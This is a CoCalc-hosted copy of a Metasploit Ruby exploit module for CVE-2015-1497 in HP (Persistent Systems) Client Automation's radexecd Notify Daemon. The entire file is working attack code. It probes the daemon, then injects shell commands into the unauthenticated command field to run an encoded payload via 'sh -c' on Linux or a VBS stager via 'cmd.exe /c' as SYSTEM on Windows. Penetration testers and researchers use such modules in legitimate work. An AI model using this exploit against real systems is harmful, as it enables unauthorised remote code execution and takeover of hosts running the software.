Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb
31759 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::CmdStager

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'HP Client Automation Command Injection',

17
        'Description' => %q{

18
          This module exploits a command injection vulnerability on HP Client Automation, distributed

19
          actually as Persistent Systems Client Automation. The vulnerability exists in the Notify

20
          Daemon (radexecd.exe), which doesn't authenticate execution requests by default.

21


22
          This module has been tested successfully on HP Client Automation 9.00 on Windows 2003 SP2

23
          and CentOS 5.

24
        },

25
        'Author' => [

26
          'Ben Turner', # Vulnerability discovery

27
          'juan vazquez' # Metasploit module

28
        ],

29
        'References' => [

30
          ['CVE', '2015-1497'],

31
          ['ZDI', '15-038'],

32
          ['URL', 'https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features']

33
        ],

34
        'Privileged' => true,

35
        'DefaultOptions' => {

36
          'WfsDelay' => 10

37
        },

38
        'Payload' => { 'DisableNops' => true },

39
        'Targets' => [

40
          [

41
            'HP Client Automation 9.0.0 / Linux',

42
            {

43
              'Platform' => 'unix',

44
              'Arch' => ARCH_CMD,

45
              'Payload' =>

46
                {

47
                  'Space' => 466,

48
                  'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,

49
                  'Compat' =>

50
              {

51
                'PayloadType' => 'cmd',

52
                'RequiredCmd' => 'openssl telnet generic gawk'

53
              },

54
                  'BadChars' => "\x27"

55
                }

56
            }

57
          ],

58
          [

59
            'HP Client Automation 9.0.0 / Windows',

60
            {

61
              'Platform' => 'win',

62
              'Arch' => ARCH_X86

63
            }

64
          ]

65
        ],

66
        'DefaultTarget' => 0,

67
        'DisclosureDate' => '2014-01-02',

68
        'Notes' => {

69
          'Reliability' => UNKNOWN_RELIABILITY,

70
          'Stability' => UNKNOWN_STABILITY,

71
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

72
        }

73
      )

74
    )

75


76
    register_options(

77
      [

78
        Opt::RPORT(3465)

79
      ]

80
    )

81


82
    deregister_options('CMDSTAGER::FLAVOR')

83
    deregister_options('CMDSTAGER::DECODER')

84
  end

85


86
  def check

87
    connect

88
    sock.put("\x00") # port

89
    sock.put("#{rand_text_alphanumeric(rand(4..6))}\x00") # user ID

90
    sock.put("#{rand_text_alpha(rand(4..6))}\x00") # password

91
    sock.put("hide\x00") # command

92
    res = sock.get_once

93
    disconnect

94


95
    if res && res.unpack('C')[0] == 0

96
      return Exploit::CheckCode::Detected

97
    end

98


99
    Exploit::CheckCode::Safe

100
  end

101


102
  def exploit

103
    case target['Platform']

104
    when 'win'

105
      print_status('Exploiting Windows target...')

106
      execute_cmdstager({ flavor: :vbs, linemax: 290 })

107
    when 'unix'

108
      print_status('Exploiting Linux target...')

109
      exploit_unix

110
    else

111
      fail_with(Failure::NoTarget, 'Invalid target')

112
    end

113
  end

114


115
  def exploit_unix

116
    connect

117
    sock.put("\x00") # port

118
    sock.put("0\x00") # user ID

119
    sock.put("#{rand_text_alpha(rand(4..6))}\x00") # password

120
    sock.put("hide hide\x09sh -c '#{payload.encoded.gsub(/\\/, '\\\\\\\\')}'\x00") # command, here commands can be injected

121
    disconnect

122
  end

123


124
  def execute_command(cmd, _opts = {})

125
    connect

126
    sock.put("\x00") # port

127
    sock.put("S-1-5-18\x00") # user ID

128
    sock.put("#{rand_text_alpha(rand(4..6))}\x00") # password

129
    sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected

130
    res = sock.get_once

131
    disconnect

132
    unless res && res.unpack('C')[0] == 0

133
      fail_with(Failure::Unknown, 'Something failed executing the stager...')

134
    end

135
  end

136
end

137


138